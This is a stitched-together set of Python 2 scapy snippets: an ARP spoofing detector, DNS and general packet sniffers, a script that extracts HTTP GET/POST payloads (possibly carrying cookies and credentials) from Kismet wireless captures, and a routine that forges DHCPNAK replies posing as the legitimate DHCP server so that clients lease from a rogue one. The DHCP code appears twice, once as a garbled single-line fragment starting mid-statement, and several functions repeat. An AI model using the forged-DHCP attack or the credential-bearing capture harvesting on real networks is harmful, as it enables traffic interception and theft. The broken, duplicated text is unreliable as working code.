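def main():
    """Start the ARP spoofing detector.

    Checks for an effective UID of 0, appends DEBUG-level logging to
    ``spoof.log``, stores the IPv4 address and broadcast address of
    interface ``en0`` in the module-level globals ``local_ip`` and
    ``broadcast``, and then passes every ARP frame scapy captures to
    ``getAdrress``.

    Raises:
        SystemExit: when not running as root, or when the interface has no
            IPv4 address/broadcast entry.
    """
    global local_ip
    global broadcast

    if os.geteuid() != 0:
        # sys.exit() instead of the site-provided exit(), which is absent when
        # the interpreter starts without the site module. The original also
        # had an unreachable sys.exit() after this call.
        sys.exit("Need root permission")

    # log file
    # NOTE(review): this is a relative path opened in append mode by a root
    # process, so it resolves against whatever the current directory is. An
    # absolute path in a root-owned directory avoids writing through a file
    # or symlink someone else placed there.
    filename = "spoof.log"
    logging.basicConfig(filename=filename, filemode="a", level=logging.DEBUG)

    # interface (unicode() is the Python 2 builtin; this file targets Python 2)
    interface = unicode("en0", "utf-8")
    addrs = netifaces.ifaddresses(interface)
    try:
        ipv4 = addrs[netifaces.AF_INET][0]
        local_ip = ipv4["addr"]
        broadcast = ipv4["broadcast"]
    except (KeyError, IndexError):
        # IndexError covers an AF_INET entry that is present but empty.
        sys.exit("Cannot read address/broadcast address on interface {}".format(interface))

    logging.info("ARP Spoofing Detection Started on {}".format(local_ip))
    print("ARP Spoofing Detection Started.")

    # NOTE(review): sniff() is called without iface=, so capture runs on
    # scapy's default interface, which may not be the interface the addresses
    # above were read from. Confirm they match on multi-homed hosts.
    scapy.sniff(filter="arp", prn=getAdrress, store=0)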
def load_pcap():
    """Merge the HTTP request packets found in Kismet ``.dump`` captures.

    Walks ``config.KismetPath``, reads every file whose name ends in
    ``.dump`` through scapy's offline sniff with ``is_http`` as the packet
    filter, prints a summary plus each packet's last layer name and payload,
    and writes the merged list to ``Packets.dump`` in the current directory.
    """
    collected = scapy.PacketList()
    for folder, _subdirs, names in os.walk(config.KismetPath):
        for name in names:
            capture = os.path.join(folder, name)
            if capture.endswith('.dump'):
                matches = scapy.sniff(offline=capture, lfilter=is_http)
                # print 'new', len(matches)
                collected.extend(matches)

    print 'Summary', collected.summary()

    # NOTE(review): the payloads printed here and saved below are raw HTTP
    # requests, which can carry cookies and credentials. Treat the terminal
    # output and Packets.dump as sensitive.
    for pkt in collected:
        print pkt.lastlayer().name, pkt.load

    # NOTE(review): if the working directory lies under config.KismetPath,
    # this output file also ends in '.dump' and would be re-read on the next
    # run. Confirm the paths are disjoint.
    scapy.wrpcap('Packets.dump', collected)
# Forge a DHCPNAK that appears to come from the legitimate DHCP server each
# time a DHCP client sends a DHCPREQUEST.
def nak_request(pkt):
    """Send one DHCPNAK built from the fields of the observed request ``pkt``.

    The frame uses the module globals ``dhcp_server_mac`` and
    ``dhcp_server_ip`` as its Ethernet/IP source and DHCP ``server_id``, and
    copies the transaction id (``xid``) and client hardware address from
    ``pkt``.

    Defensive note: because the source MAC, source IP and server_id all match
    the legitimate server, a client cannot tell this frame apart by address.
    The control that stops it is DHCP snooping on the access switch, which
    only accepts server-type DHCP messages on trusted ports.
    """
    env = globals()
    msg("Spoofing DHCPNAK from " + env['dhcp_server_mac'], 2)

    # Layers are stacked in the same left-to-right order as the wire format.
    frame = Ether(src=env['dhcp_server_mac'], dst=pkt[Ether].dst)
    frame = frame / IP(src=env['dhcp_server_ip'], dst=pkt[IP].dst)
    frame = frame / UDP(sport=67, dport=68)
    frame = frame / BOOTP(op=2,
                          ciaddr=pkt[IP].src,
                          siaddr=pkt[IP].dst,
                          chaddr=pkt[Ether].src,
                          xid=pkt[BOOTP].xid)
    frame = frame / DHCP(options=[('server_id', env['dhcp_server_ip']),
                                  ('message-type', 'nak'),
                                  ('end')])
    sendp(frame)


# Wait at most one second for a single DHCP packet that does not involve
# illegal_dhcp_server_ip and hand it to get_dhcp_server.
sniff(filter="udp and not host " + globals()['illegal_dhcp_server_ip'] + " and (port 67 or 68)",
      prn=get_dhcp_server,
      store=0,
      count=1,
      timeout=1)

# dhcp_server_ip is presumably set by get_dhcp_server; without it there is no
# second server on the segment to work with. has_key() is Python 2 only.
if not globals().has_key('dhcp_server_ip'):
    print("No other DHCP server found, exiting")
    sys.exit(0)

# Main loop: every ARP frame and DHCP packet goes to detect_dhcp_request.
sniff(filter="arp or (udp and (port 67 or 68))", prn=detect_dhcp_request, store=0)
nak_request(pkt) else: msg("Giving up on spoofing DHCPNAK's for " + pkt[Ether].src + ", failed " + str(globals()['limit']) + " times",2) del globals()['attempted_dhcpnaks'][pkt[Ether].src] if pkt[ARP] and pkt[ARP].op == 0x0002: if globals()['macs'].has_key(pkt[Ether].src) == True: if pkt[ARP].hwdst == globals()['illegal_dhcp_server_mac']: msg("Succes: DHCP client " + pkt[ARP].hwsrc + " obtained a lease for " + pkt[ARP].psrc + "from the illegal DHCP server",1) elif pkt[ARP].hwdst == globals()['dhcp_server_mac']: msg("Failure: DHCP client " + pkt[ARP].hwsrc + " obtained a lease for " + pkt[ARP].psrc + " from the legit DHCP server",1) del globals()['macs'][pkt[Ether].src] # Spoofing a DHCPNAK from the legit DHCP server when a DHCPREQUEST is send from the DHCP client. def nak_request(pkt): msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'],2) sendp(Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst)/ IP(src=globals()['dhcp_server_ip'],dst=pkt[IP].dst)/UDP(sport=67,dport=68)/ BOOTP(op=2, ciaddr=pkt[IP].src,siaddr=pkt[IP].dst,chaddr=pkt[Ether].src, xid=pkt[BOOTP].xid)/ DHCP(options=[('server_id',globals()['dhcp_server_ip']),('message-type','nak'), ('end')])) sniff(filter="udp and not host " + globals()['illegal_dhcp_server_ip'] + " and (port 67 or 68)", prn=get_dhcp_server, store=0, count=1, timeout=1) if globals().has_key('dhcp_server_ip') == False: print("No other DHCP server found, exiting") sys.exit(0) sniff(filter="arp or (udp and (port 67 or 68))", prn=detect_dhcp_request, store=0)
def main():
    """Capture one packet matching ``udp port 53`` on eth0 and pass it to procPacket.

    The BPF filter only matches UDP, so DNS carried over TCP port 53 or over
    an encrypted transport is not seen by this capture.
    """
    capture_args = {
        "iface": "eth0",
        "count": 1,  # stop after the first matching packet
        "filter": "udp port 53",
        "prn": procPacket,
    }
    scapy.sniff(**capture_args)
def read_pcap(filepath, packets):
    """Replay the capture file at ``filepath`` through scapy.

    Each packet read is handed to the callback that ``add_packet(packets)``
    returns. ``store`` is left at scapy's default, so sniff() also builds its
    own packet list, which is discarded here.
    """
    on_packet = add_packet(packets)
    sniff(offline=filepath, prn=on_packet)
def run_capture(interface, duration, packets):
    """Capture live traffic on ``interface`` for ``duration`` seconds.

    ``duration`` is converted with float(), so a non-numeric value raises
    before capture starts. Packets are not stored by scapy (``store=0``).
    Each one is passed to the callback returned by ``add_packet(packets)``.
    No capture filter is applied, so every frame on the interface reaches
    the callback.
    """
    window = float(duration)
    on_packet = add_packet(packets)
    sniff(iface=interface, timeout=window, store=0, prn=on_packet)
def main():
    """Sniff a single ``udp port 53`` packet on eth0 and give it to procPacket.

    Only UDP is matched. DNS over TCP port 53 does not pass this filter.
    """
    scapy.sniff(
        prn=procPacket,
        filter="udp port 53",
        count=1,  # return after the first matching packet
        iface="eth0",
    )
import os
import scapy
import config


def is_http(p):
    """Return True for a TCP packet to port 80 whose payload starts with GET or POST.

    Only the destination port and the first bytes of the payload are checked,
    so other HTTP methods, requests on other ports and TLS traffic are not
    matched.
    """
    if p.haslayer('TCP') and p.dport == 80 and p.haslayer('Raw'):
        return p.load.startswith('GET') or p.load.startswith('POST')
    return False


# Gather matching packets from every Kismet '.dump' capture under KismetPath.
packets = scapy.PacketList()
for root, dirs, filenames in os.walk(config.KismetPath):
    for file in filenames:
        filename = os.path.join(root, file)
        if filename.endswith('.dump'):
            new = scapy.sniff(offline=filename, lfilter=is_http)
            print 'new', len(new)
            packets.extend(new)

#print 'Summary', packets.summary()

# NOTE(review): these payloads are raw HTTP requests and can contain cookies
# or credentials. Treat the console output and Packets.dump as sensitive.
for p in packets:
    print p.lastlayer().name, p.load

scapy.wrpcap('Packets.dump', packets)
def sniff_packet(interface):
    """Sniff on ``interface`` and pass every packet to process_packets.

    No filter, count or timeout is given, so the call sees all traffic on the
    interface and does not return on its own. Packets are not stored by scapy
    (``store=False``).
    """
    scapy.sniff(prn=process_packets, store=False, iface=interface)
def read_pcap(filepath, packets):
    """Read the pcap at ``filepath`` offline, one packet at a time.

    The per-packet callback is whatever ``add_packet(packets)`` returns.
    scapy's default ``store`` setting is used, so the list sniff() returns is
    built and then dropped.
    """
    handler = add_packet(packets)
    sniff(prn=handler, offline=filepath)
def run_capture(interface, duration, packets):
    """Run a live, unfiltered capture on ``interface`` for ``duration`` seconds.

    ``float(duration)`` is evaluated first, so an unparsable duration raises
    before any capture begins. scapy keeps no packet list (``store=0``).
    The callback returned by ``add_packet(packets)`` receives each packet.
    """
    seconds = float(duration)
    handler = add_packet(packets)
    sniff(prn=handler, store=0, timeout=seconds, iface=interface)